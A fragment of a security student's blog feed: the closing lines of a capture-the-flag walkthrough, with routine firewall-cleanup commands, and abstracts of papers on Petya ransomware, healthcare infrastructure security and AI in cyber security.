So to find the last flag, simply repeat the process for our previous sql_svc user.

Archetype Walkthrough
root.txt

Finally, if you want to delete the rules we added to the firewall, you can run the following commands.

sudo ufw status numbered
sudo ufw delete [rule number you want to delete] 
Archetype Walkthrough
Archetype Walkthrough

Okay... I’ll see you on the next box! Oopsie 🙋‍♂️

Thanks for reading this post, if you like my work you can support by buying me a coffee. ☕️

]]>
<![CDATA[Petya Ransomware Attack: Critical Analysis, Detection, and Prevention]]>https://shehansanjula.github.io/blog/petya-ransomware-attack-critical-analysis-detection-and-prevention/63c3a82da4552e005506103fTue, 15 Jun 2021 12:21:00 GMT
Petya Ransomware Attack: Critical Analysis, Detection, and Prevention

This is an individual assignment that I did under the Secure Software Systems module when I was in the 3rd year 1st semester. This research paper is about Petya Ransomware. It will help anyone to get an understanding of what Petya Ransomware means.

R. A. Shehan Sanjula | Sri Lanka Institute of Information Technology - Academia.edu
Academia.edu is a place to share and follow research.
Petya Ransomware Attack: Critical Analysis, Detection, and Prevention
🏆 Top 2%


Petya Ransomware Attack Critical Analysis Detection and Prevention
Ransomware has been growing worldwide since its first appearance in 1989 [1]. The destructive impacts of ransomware have continued to evolve over the past two decades significantly [2]. Petya is another critical ransomware that shifted from just
Petya Ransomware Attack: Critical Analysis, Detection, and Prevention

]]>
<![CDATA[Critical Infrastructure Security in the Healthcare Sector]]>https://shehansanjula.github.io/blog/critical-infrastructure-security-in-the-healthcare-sector/63c3a82da4552e0055061040Tue, 01 Jun 2021 03:12:00 GMT
Critical Infrastructure Security in the Healthcare Sector

This is an individual assignment that I did under the Applied Information Assurance module when I was in the 3rd year 1st semester. The study discusses the critical infrastructure security of the healthcare industry, the threats to healthcare infrastructure, the various techniques that can be used to prevent cyberattacks, and how to apply them to the IoT (Internet of Things) based healthcare sector. The study also covers the encryption standards used in the healthcare sector to defend its infrastructure from cyber threats.

R. A. Shehan Sanjula | Sri Lanka Institute of Information Technology - Academia.edu
Academia.edu is a place to share and follow research.
Critical Infrastructure Security in the Healthcare Sector
🏆 Top 2%

Critical Infrastructure Security in the Healthcare Sector
All critical infrastructures around the globe have become an increasing target of cyberattacks day by day. These cyberattacks are significantly concerning the healthcare sector as their primary target [1,2]. The last few years have seen the
Critical Infrastructure Security in the Healthcare Sector

]]>
<![CDATA[The Influence of Artificial Intelligence on Cyber Security]]>https://shehansanjula.github.io/blog/the-influence-of-artificial-intelligence-on-cyber-security/63c3a82da4552e0055061045Tue, 21 Apr 2020 02:02:00 GMT
The Influence of Artificial Intelligence on Cyber Security

This is an individual assignment that I did under the Introduction to Cybersecurity module when I was in the 2nd year 1st semester. This report reviews the influence of Artificial Intelligence (AI) on cyber security processes. Artificial intelligence consists of a set of practices covering machine learning, deep learning, neural networks and natural language processing, among other variants. Machines can exhibit artificial intelligence as their primary intelligence: a system can be called AI if it perceives its environment and decides on the actions needed to succeed in its field.

R. A. Shehan Sanjula | Sri Lanka Institute of Information Technology - Academia.edu
Academia.edu is a place to share and follow research.
The Influence of Artificial Intelligence on Cyber Security
🏆 Top 2%

In our day-to-day lives, artificial intelligence keeps growing rapidly by transforming the duties of people in society. At present, the most powerful companies use artificial intelligence to improve their productivity for a better marketplace. As we know, this technology is rising quickly; hence the growth of cybercrime, which is closely tied to cyber security, is also rising alongside the positive improvements. So, cyber systems are exposed to many kinds of abnormal behaviours and threats. Read more...👇


The Influence of Artificial Intelligence on Cyber Security
This report reviews the influence of Artificial Intelligence (AI) on cyber security processes. For example, artificial intelligence consists of a bunch of practices that are covering machine learning, deep learning, neural networks, natural language
The Influence of Artificial Intelligence on Cyber Security

]]>